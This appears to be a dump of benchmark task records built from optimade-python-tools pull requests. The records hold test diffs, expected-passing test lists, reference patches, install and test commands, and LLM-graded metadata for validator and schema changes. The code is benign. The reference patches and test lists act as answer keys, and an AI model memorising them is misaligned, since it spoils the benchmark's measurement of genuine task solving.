assert validator.results.optional_failure_count == 2 + assert 
validator.results.internal_failure_count == 0 assert output[0] is None assert ( @@ -166,10 +168,10 @@ def test_expected_failure_test_case(): == "Critical: unable to parse server response as JSON. JSONDecodeError: Dummy JSON error: line 1 column 1 (char 0)" ) assert ( - validator.optional_failure_messages[-1][0] + validator.results.optional_failure_messages[-1][0] == "✖: http://example.org/test_request - dummy_test_case - failed with error" ) - assert validator.optional_failure_messages[-1][1] == [ + assert validator.results.optional_failure_messages[-1][1] == [ "Critical: unable to parse server response as JSON. JSONDecodeError: Dummy JSON error: line 1 column 1 (char 0)" ] @@ -185,19 +187,19 @@ def test_unexpected_failure_test_case(): request="test_request", raise_exception=FileNotFoundError("Unexpected error"), ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 1 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 1 assert output[0] is None assert output[1] == "FileNotFoundError: Unexpected error" assert ( - validator.internal_failure_messages[-1][0] + validator.results.internal_failure_messages[-1][0] == "!: http://example.org/test_request - dummy_test_case - failed with internal error" ) - assert validator.internal_failure_messages[-1][1] == [ + assert validator.results.internal_failure_messages[-1][1] == [ "FileNotFoundError: Unexpected error" ] @@ -208,19 +210,19 @@ def test_unexpected_failure_test_case(): raise_exception=FileNotFoundError("Unexpected error"), optional=True, ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 
- assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 2 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 2 assert output[0] is None assert output[1] == "FileNotFoundError: Unexpected error" assert ( - validator.internal_failure_messages[-1][0] + validator.results.internal_failure_messages[-1][0] == "!: http://example.org/test_request - dummy_test_case - failed with internal error" ) - assert validator.internal_failure_messages[-1][1] == [ + assert validator.results.internal_failure_messages[-1][1] == [ "FileNotFoundError: Unexpected error" ] @@ -236,11 +238,11 @@ def test_multistage_test_case(): request="test_request", multistage=True, ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert validator.results.internal_failure_count == 0 assert output[0] == {"test": "dict"} assert output[1] == "message" @@ -252,19 +254,21 @@ def test_multistage_test_case(): raise_exception=ResponseError("Stage of test failed"), multistage=True, ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 1 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 1 + assert validator.results.optional_failure_count == 0 + assert 
validator.results.internal_failure_count == 0 assert output[0] is None assert output[1] == "ResponseError: Stage of test failed" assert ( - validator.failure_messages[-1][0] + validator.results.failure_messages[-1][0] == "✖: http://example.org/test_request - dummy_test_case - failed with error" ) - assert validator.failure_messages[-1][1] == ["ResponseError: Stage of test failed"] + assert validator.results.failure_messages[-1][1] == [ + "ResponseError: Stage of test failed" + ] def test_fail_fast_test_case(): @@ -281,18 +285,18 @@ def test_fail_fast_test_case(): raise_exception=ResponseError("Optional test failed"), optional=True, ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 1 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 1 + assert validator.results.internal_failure_count == 0 assert output[0] is None assert output[1] == "ResponseError: Optional test failed" - assert validator.optional_failure_messages[-1][0] == ( + assert validator.results.optional_failure_messages[-1][0] == ( "✖: http://example.org/test_request - dummy_test_case - failed with error" ) - assert validator.optional_failure_messages[-1][1] == [ + assert validator.results.optional_failure_messages[-1][1] == [ "ResponseError: Optional test failed" ] @@ -305,15 +309,15 @@ def test_fail_fast_test_case(): raise_exception=ResponseError("Non-optional test failed"), optional=False, ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 1 - assert validator.optional_failure_count == 1 - assert validator.internal_failure_count == 0 - assert validator.failure_messages[-1][0] == ( + assert validator.results.success_count == 
0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 1 + assert validator.results.optional_failure_count == 1 + assert validator.results.internal_failure_count == 0 + assert validator.results.failure_messages[-1][0] == ( "✖: http://example.org/test_request - dummy_test_case - failed with error" ) - assert validator.failure_messages[-1][1] == [ + assert validator.results.failure_messages[-1][1] == [ "ResponseError: Non-optional test failed" ] @@ -325,15 +329,15 @@ def test_fail_fast_test_case(): request="test_request", raise_exception=FileNotFoundError("Internal error"), ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 1 - assert validator.optional_failure_count == 1 - assert validator.internal_failure_count == 1 - assert validator.internal_failure_messages[-1][0] == ( + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 1 + assert validator.results.optional_failure_count == 1 + assert validator.results.internal_failure_count == 1 + assert validator.results.internal_failure_messages[-1][0] == ( "!: http://example.org/test_request - dummy_test_case - failed with internal error" ) - assert validator.internal_failure_messages[-1][1] == [ + assert validator.results.internal_failure_messages[-1][1] == [ "FileNotFoundError: Internal error" ] @@ -353,8 +357,8 @@ def test_that_system_exit_is_fatal_in_test_case(): optional=True, ) - assert validator.success_count == 0 - assert validator.optional_success_count == 0 - assert validator.failure_count == 0 - assert validator.optional_failure_count == 0 - assert validator.internal_failure_count == 0 + assert validator.results.success_count == 0 + assert validator.results.optional_success_count == 0 + assert validator.results.failure_count == 0 + assert validator.results.optional_failure_count == 0 + assert 
validator.results.internal_failure_count == 0
[ "tests/validator/test_utils.py::test_normal_test_case", "tests/validator/test_utils.py::test_optional_test_case", "tests/validator/test_utils.py::test_ignored_test_case", "tests/validator/test_utils.py::test_skip_optional_test_case", "tests/validator/test_utils.py::test_expected_failure_test_case", "tests/validator/test_utils.py::test_unexpected_failure_test_case", "tests/validator/test_utils.py::test_multistage_test_case", "tests/validator/test_utils.py::test_fail_fast_test_case", "tests/validator/test_utils.py::test_that_system_exit_is_fatal_in_test_case" ]
[]
Method: ImplementationValidator.__init__(self, client=None, base_url=None, verbosity: int = 0, respond_json: bool = False, page_limit: int = 5, max_retries: int = 5, run_optional_tests: bool = True, fail_fast: bool = False, as_type=None, index: bool = False) Location: optimade.validator.validator – class ImplementationValidator constructor Inputs: optional client instance, base URL string, integer verbosity level, boolean ``respond_json`` flag that selects JSON‑only output, pagination limit, retry count, flags for running optional tests and fail‑fast mode, optional ``as_type`` conversion class, and a boolean indicating whether the validator is run against the main index. Outputs: creates an ``ImplementationValidator`` instance with an internal ``respond_json`` attribute and a ``results`` attribute (instance of ``ValidatorResults``). The flag influences later logging and output behaviour. Description: Constructs the validator object; the new ``respond_json`` parameter activates a mode where only a JSON summary of validation results is emitted to stdout. Class: ValidatorResults Location: optimade.validator.validator – dataclass defined alongside ``ImplementationValidator`` Inputs: None (all fields have default values). Outputs: dataclass instance exposing: - ``success_count`` (int) - ``failure_count`` (int) - ``internal_failure_count`` (int) - ``optional_success_count`` (int) - ``optional_failure_count`` (int) - ``failure_messages`` (List[Tuple[str, str]]) - ``internal_failure_messages`` (List[Tuple[str, str]]) - ``optional_failure_messages`` (List[Tuple[str, str]]) Description: Holds aggregated counts and messages for all validation tests; used by the validator to report results and to generate the JSON summary when ``respond_json`` is enabled. Method: ImplementationValidator.print_summary(self) Location: optimade.validator.validator – method of ``ImplementationValidator`` Inputs: none (relies on instance state). 
Outputs: - If ``self.respond_json`` is ``True``: prints a JSON‑encoded representation of ``self.results`` to stdout and returns immediately. - Otherwise: prints human‑readable failure, optional‑failure, and internal‑failure sections followed by a textual summary of passed/failed tests. Description: Emits the final validation report; the added JSON‑output branch is exercised when the validator is created with ``respond_json=True``.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/server/test_server_validation.py tests/validator/test_utils.py" }
{ "num_modified_files": 4, "num_modified_lines": 76, "pr_author": "ml-evs", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests a JSON output flag for the validator and a restructuring of result tracking. The tests check that the flag produces a JSON dump, that the validator's success/failure counters are accessed via a new dataclass, and that verbosity is suppressed. The test expectations match the described behavior and no unrelated modules, naming mismatches, external info, or ambiguity are present, so the task is clearly specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, 
"test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
c34f8a066011aa1c7bfed254f9b629d24406e761
2020-09-21 11:04:40
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511?src=pr&el=h1) Report > Merging [#511](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511?src=pr&el=desc) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/41c26e5a7b8297aaffe9ae83112a17a0af01d3d4?el=desc) will **increase** coverage by `0.00%`. > The diff coverage is `100.00%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #511 +/- ## ======================================= Coverage 91.59% 91.59% ======================================= Files 61 62 +1 Lines 3118 3119 +1 ======================================= + Hits 2856 2857 +1 Misses 262 262 ``` | Flag | Coverage Δ | | |---|---|---| | #project | `91.59% <100.00%> (+<0.01%)` | :arrow_up: | | #validator | `63.73% <100.00%> (+0.01%)` | :arrow_up: | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags#carryforward-flags-in-the-pull-request-comment) to find out more. 
| [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [optimade/server/routers/utils.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511/diff?src=pr&el=tree#diff-b3B0aW1hZGUvc2VydmVyL3JvdXRlcnMvdXRpbHMucHk=) | `97.72% <ø> (-0.29%)` | :arrow_down: | | [optimade/server/routers/info.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511/diff?src=pr&el=tree#diff-b3B0aW1hZGUvc2VydmVyL3JvdXRlcnMvaW5mby5weQ==) | `96.15% <100.00%> (ø)` | | | [optimade/server/schemas.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511/diff?src=pr&el=tree#diff-b3B0aW1hZGUvc2VydmVyL3NjaGVtYXMucHk=) | `100.00% <100.00%> (ø)` | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511?src=pr&el=footer). Last update [41c26e5...eddaf86](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/511?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). ml-evs: > On another note, are you sure we don't need to take `allOf`, `anyOf`, etc. into account in the recursive function? I'm sure _for now_... I think the problem we were having was also providing a schema for the links endpoint, which was running into the multiple allowed response types. We don't have that anywhere in our structure/reference models so this should be useful as is.
materials-consortia__optimade-python-tools-511
diff --git a/docs/api_reference/server/schemas.md b/docs/api_reference/server/schemas.md new file mode 100644 index 00000000..7bdb6e54 --- /dev/null +++ b/docs/api_reference/server/schemas.md @@ -0,0 +1,3 @@ +# schemas + +::: optimade.server.schemas diff --git a/optimade/server/routers/info.py b/optimade/server/routers/info.py index e138238f..f96aadfb 100644 --- a/optimade/server/routers/info.py +++ b/optimade/server/routers/info.py @@ -11,24 +11,17 @@ from optimade.models import ( ErrorResponse, InfoResponse, EntryInfoResponse, - ReferenceResource, - StructureResource, ) +from optimade.server.schemas import ENTRY_INFO_SCHEMAS, retrieve_queryable_properties from optimade.server.routers.utils import ( meta_values, - retrieve_queryable_properties, get_base_url, ) router = APIRouter(redirect_slashes=True) -ENTRY_INFO_SCHEMAS = { - "structures": StructureResource.schema, - "references": ReferenceResource.schema, -} - @router.get( "/info", diff --git a/optimade/server/routers/utils.py b/optimade/server/routers/utils.py index 06a7a70f..95c9649b 100644 --- a/optimade/server/routers/utils.py +++ b/optimade/server/routers/utils.py @@ -14,9 +14,6 @@ from optimade.models import ( EntryResponseMany, EntryResponseOne, ToplevelLinks, - ReferenceResource, - StructureResource, - DataType, ) from optimade.server.config import CONFIG @@ -24,11 +21,6 @@ from optimade.server.entry_collections import EntryCollection from optimade.server.exceptions import BadRequest from optimade.server.query_params import EntryListingQueryParams, SingleEntryQueryParams -ENTRY_INFO_SCHEMAS = { - "structures": StructureResource.schema, - "references": ReferenceResource.schema, -} - # we need to get rid of any release tags (e.g. -rc.2) and any build metadata (e.g. 
+py36) # from the api_version before allowing the URL BASE_URL_PREFIXES = { @@ -271,34 +263,6 @@ def get_single_entry( ) -def retrieve_queryable_properties(schema: dict, queryable_properties: list) -> dict: - properties = {} - for name, value in schema["properties"].items(): - if name in queryable_properties: - if "$ref" in value: - path = value["$ref"].split("/")[1:] - sub_schema = schema.copy() - while path: - next_key = path.pop(0) - sub_schema = sub_schema[next_key] - sub_queryable_properties = sub_schema["properties"].keys() - properties.update( - retrieve_queryable_properties(sub_schema, sub_queryable_properties) - ) - else: - properties[name] = {"description": value.get("description", "")} - if "unit" in value: - properties[name]["unit"] = value["unit"] - # All properties are sortable with the MongoDB backend. - # While the result for sorting lists may not be as expected, they are still sorted. - properties[name]["sortable"] = True - # Try to get OpenAPI-specific "format" if possible, else get "type"; a mandatory OpenAPI key. - properties[name]["type"] = DataType.from_json_type( - value.get("format", value["type"]) - ) - return properties - - def mongo_id_for_database(database_id: str, database_type: str) -> str: """Produce a MondoDB ObjectId for a database""" from bson.objectid import ObjectId diff --git a/optimade/server/schemas.py b/optimade/server/schemas.py new file mode 100644 index 00000000..d059a815 --- /dev/null +++ b/optimade/server/schemas.py @@ -0,0 +1,50 @@ +from optimade.models import DataType, StructureResource, ReferenceResource + +ENTRY_INFO_SCHEMAS = { + "structures": StructureResource.schema, + "references": ReferenceResource.schema, +} + + +def retrieve_queryable_properties(schema: dict, queryable_properties: list) -> dict: + """Recurisvely loops through the schema of a pydantic model and + resolves all references, returning a dictionary of all the + OPTIMADE-queryable properties of that model. 
+ + Parameters: + schema: The schema of the pydantic model. + queryable_properties: The list of properties to find in the schema. + + Returns: + A flat dictionary with properties as keys, containing the field + description, unit, sortability, support level, queryability + and type, where provided. + + """ + properties = {} + for name, value in schema["properties"].items(): + if name in queryable_properties: + if "$ref" in value: + path = value["$ref"].split("/")[1:] + sub_schema = schema.copy() + while path: + next_key = path.pop(0) + sub_schema = sub_schema[next_key] + sub_queryable_properties = sub_schema["properties"].keys() + properties.update( + retrieve_queryable_properties(sub_schema, sub_queryable_properties) + ) + else: + properties[name] = {"description": value.get("description", "")} + # Update schema with extension keys provided they are not None + for key in [_ for _ in ("unit", "queryable", "support") if _ in value]: + properties[name][key] = value[key] + # All properties are sortable with the MongoDB backend. + # While the result for sorting lists may not be as expected, they are still sorted. + properties[name]["sortable"] = value.get("sortable", True) + # Try to get OpenAPI-specific "format" if possible, else get "type"; a mandatory OpenAPI key. + properties[name]["type"] = DataType.from_json_type( + value.get("format", value["type"]) + ) + + return properties
Move entry schemas to separate submodule This PR is a shortcut version of #277 whilst retaining most of its features. The `ENTRY_INFO_SCHEMA` constant dict has been moved to a new submodule and new extension fields ("support" and "queryable") are now made available so they can also be used by the validator more cleanly in #503, and eventually in the server code in #504. All that is missing to enable #277 is to wrap this in a class to provide a nicer interface for implementations to use their own models in `ENTRY_INFO_SCHEMAS` rather than the hardcoded `StructureResource` etc. I think this is a less important point than the other bits though.
**Title** Centralize entry schemas and extend queryable property handling **Problem** Server routes needed a reliable source for entry model schemas, but the schemas were scattered and the utility for extracting queryable properties did not recognise the newly‑added extension fields. This caused duplication and limited extensibility for future schema features. **Root Cause** The schema definitions were embedded in multiple modules, and the property‑retrieval logic only accounted for a subset of schema extensions. **Fix / Expected Behavior** - Relocate the entry schema mapping to a dedicated schema component, providing a single source of truth. - Adjust server routers to import the schema mapping from the new component. - Enhance the queryable‑property extraction routine to propagate additional extension keys (e.g., “unit”, “queryable”, “support”) when present. - Preserve existing functionality for sortable and type information while supporting the new extensions. - Ensure the API documentation reflects the new schema module. **Risk & Validation** - Verify that all `/info` and related endpoints continue to return correct schema metadata. - Run the existing test suite, focusing on schema validation and queryable property listings. - Confirm that documentation builds without errors and accurately lists the exposed schemas.
511
Materials-Consortia/optimade-python-tools
diff --git a/tests/server/test_schemas.py b/tests/server/test_schemas.py new file mode 100644 index 00000000..dfb5c980 --- /dev/null +++ b/tests/server/test_schemas.py @@ -0,0 +1,32 @@ +from optimade.server.schemas import ENTRY_INFO_SCHEMAS, retrieve_queryable_properties + + +def test_schemas(): + """Test that the default `ENTRY_INFO_SCHEMAS` contain + all the required information about the OPTIMADE properties + after dereferencing. + + """ + for entry in ("Structures", "References"): + schema = ENTRY_INFO_SCHEMAS[entry.lower()]() + + top_level_props = ("id", "type", "attributes") + properties = retrieve_queryable_properties(schema, top_level_props) + + fields = list( + schema["definitions"][f"{entry[:-1]}ResourceAttributes"][ + "properties" + ].keys() + ) + fields += ["id", "type"] + + # Check all fields are present + assert all(field in properties for field in fields) + + # Check that there are no references to definitions remaining + assert "$ref" not in properties + assert not any("$ref" in properties[field] for field in properties) + + # Check that all expected keys are present for OPTIMADE fields + for key in ("type", "sortable", "queryable", "description"): + assert all(key in properties[field] for field in properties)
[ "tests/server/test_schemas.py::test_schemas" ]
[]
Function: retrieve_queryable_properties(schema: dict, queryable_properties: list) Location: optimade.server.schemas Inputs: - **schema** (dict): JSON schema dictionary produced by a Pydantic model (e.g., `StructureResource.schema`). - **queryable_properties** (list): Iterable of top‑level property names that should be inspected (e.g., `["id", "type", "attributes"]`). Outputs: - **dict** mapping each resolved property name to a dictionary containing: - `description` (str) – field description (empty string if missing). - Optional `unit`, `queryable`, `support` – passed through from the original schema when present. - `sortable` (bool) – always `True` unless overridden in the schema. - `type` (optimade.models.DataType) – the OpenAPI type derived via `DataType.from_json_type`. Description: Recursively walks a Pydantic model’s JSON schema, follows any ``$ref`` references, and builds a flat dictionary of all OPTIMADE‑queryable fields with their metadata, now also exposing the optional ``queryable`` and ``support`` extension keys.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/server/test_schemas.py" }
{ "num_modified_files": 4, "num_modified_lines": 54, "pr_author": "ml-evs", "pr_labels": [ "enhancement: New feature or request", "priority/medium: Issue or PR with a consensus of medium priority" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.94, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "dev_ops_enh", "documentation_enh" ], "reason": null, "reasoning": "The issue requests moving the entry schema definitions and helper into a new server.schemas submodule and updating imports accordingly. The provided test imports ENTRY_INFO_SCHEMAS and retrieve_queryable_properties from that module and validates their behavior, which matches the described functionality. No evidence of missing specifications, external dependencies, or implicit expectations beyond the stated API, so the task is cleanly solvable. 
Therefore it is classified as SOLVABLE (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
d207200c7cf8cbaf71dd0f3c4deb67115e4155eb
2020-10-19 21:29:37
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560?src=pr&el=h1) Report > Merging [#560](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560?src=pr&el=desc) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/e7432a2cdbd38f78c7d2dbfacc115d461e4dd9c0?el=desc) will **increase** coverage by `0.03%`. > The diff coverage is `100.00%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #560 +/- ## ========================================== + Coverage 91.47% 91.51% +0.03% ========================================== Files 62 62 Lines 3110 3110 ========================================== + Hits 2845 2846 +1 + Misses 265 264 -1 ``` | Flag | Coverage Δ | | |---|---|---| | #project | `91.51% <100.00%> (+0.03%)` | :arrow_up: | | #validator | `63.53% <100.00%> (ø)` | | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags#carryforward-flags-in-the-pull-request-comment) to find out more. | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [optimade/models/structures.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560/diff?src=pr&el=tree#diff-b3B0aW1hZGUvbW9kZWxzL3N0cnVjdHVyZXMucHk=) | `95.62% <100.00%> (+0.54%)` | :arrow_up: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? 
= missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560?src=pr&el=footer). Last update [e7432a2...842f65b](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/560?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). ml-evs: Following discussions in the meeting today, it was agreed that we would go down the "required optional" key route for OPTIMADE should fields, so the changes in this PR should (and do) preserve the OpenAPI schema as it is. This has the side effect that some valid OPTIMADE responses will not be able to validated against the OpenAPI schema (which is the case at the moment anyway). This is mostly due to a mismatch between our definitions and OpenAPI, which we can consider tidying in the specification text. We could consider patching the OpenAPI schema for these SHOULD field models with the OpenAPI property `nullable`, and if we're feeling extra charitable we could try port it upstream to pydantic/FastAPI... CasperWA: What's the motivation behind only testing the server for the real MongoDB in the CI? ml-evs: > What's the motivation behind only testing the server for the real MongoDB in the CI? The server tests are the only bits that use the backend, so testing everything twice is redundant. When I first added the tests in this PR on all of our structures, it was taking 4-5 mins *per backend* to run. You could argue that these tests are overkill anyway (testing all possible combinations of 1-`N` fields being `null` in the response), but I think it's worth doing for at least a few structures. I reduced this to about ~1 minute by only testing a few structures, but it doesn't make sense to me to run e.g. the model tests with Mongo too. ml-evs: > > What's the motivation behind only testing the server for the real MongoDB in the CI? > > The server tests are the only bits that use the backend, so testing everything twice is redundant. 
When I first added the tests in this PR on all of our structures, it was taking 4-5 mins _per backend_ to run. You could argue that these tests are overkill anyway (testing all possible combinations of 1-`N` fields being `null` in the response), but I think it's worth doing for at least a few structures. I reduced this to about ~1 minute by only testing a few structures, but it doesn't make sense to me to run e.g. the model tests with Mongo too. Going to revisit this, I think coverage might actually improve if testing was performed on *only* the awkward edge-case structure, which will speed things up massively. Then we can decide whether we want to keep running all tests with Mongo for extra redudancy CasperWA: > > What's the motivation behind only testing the server for the real MongoDB in the CI? > > The server tests are the only bits that use the backend, so testing everything twice is redundant. When I first added the tests in this PR on all of our structures, it was taking 4-5 mins _per backend_ to run. You could argue that these tests are overkill anyway (testing all possible combinations of 1-`N` fields being `null` in the response), but I think it's worth doing for at least a few structures. I reduced this to about ~1 minute by only testing a few structures, but it doesn't make sense to me to run e.g. the model tests with Mongo too. Great. And sounds completely reasonable 👍 ml-evs: Have added the root validator directly into this PR to see how it interacts with the model changes, but it could also be pulled out. As we're only raising warnings (for now) on `null`, the `if v is None` bits of the field validators should still stay in. One important think to check is how well `CORRELATED_STRUCTURE_FIELDS` matches with the specification, and if there are any better ways we could include it (instead of a module level constant). ml-evs: > Let's get this in now and optimize afterwards. > This is blocking some things in my implementation as well. 
> > Thanks @ml-evs ! muscle Could I be slightly awkward and request that we merge #591 (tiny changes but removes a false negative for validation), release a very minor 0.12.4, and _then_ merge this, ready to release 0.13 after the other bigger PRs are finished?
materials-consortia__optimade-python-tools-560
diff --git a/.github/workflows/deps_lint.yml b/.github/workflows/deps_lint.yml index 2f1dacb0..3650a70c 100644 --- a/.github/workflows/deps_lint.yml +++ b/.github/workflows/deps_lint.yml @@ -175,8 +175,8 @@ jobs: pip install -r requirements.txt pip install -r requirements-dev.txt - - name: Run all tests (using a real MongoDB) - run: pytest -rs -vvv --cov=./optimade/ --cov-report=xml tests/ + - name: Run server tests (using a real MongoDB) + run: pytest -rs -vvv --cov=./optimade/ --cov-report=xml tests/server env: OPTIMADE_CI_FORCE_MONGO: 1 diff --git a/openapi/openapi.json b/openapi/openapi.json index b46e0731..b8bc3301 100644 --- a/openapi/openapi.json +++ b/openapi/openapi.json @@ -3020,7 +3020,8 @@ "title": "Last Modified", "type": "string", "description": "Date and time representing when the entry was last modified.\n\n- **Type**: timestamp.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - **Response**: REQUIRED in the response unless the query parameter `response_fields` is present and does not include this property.\n\n- **Example**:\n - As part of JSON response format: `\"2007-04-05T14:30:20Z\"` (i.e., encoded as an [RFC 3339 Internet Date/Time Format](https://tools.ietf.org/html/rfc3339#section-5.6) string.)", - "format": "date-time" + "format": "date-time", + "nullable": true }, "elements": { "title": "Elements", @@ -3028,12 +3029,14 @@ "items": { "type": "string" }, - "description": "Names of the different elements present in the structure.\n\n- **Type**: list of strings.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - The strings are the chemical symbols, i.e., either a single uppercase letter or an uppercase letter 
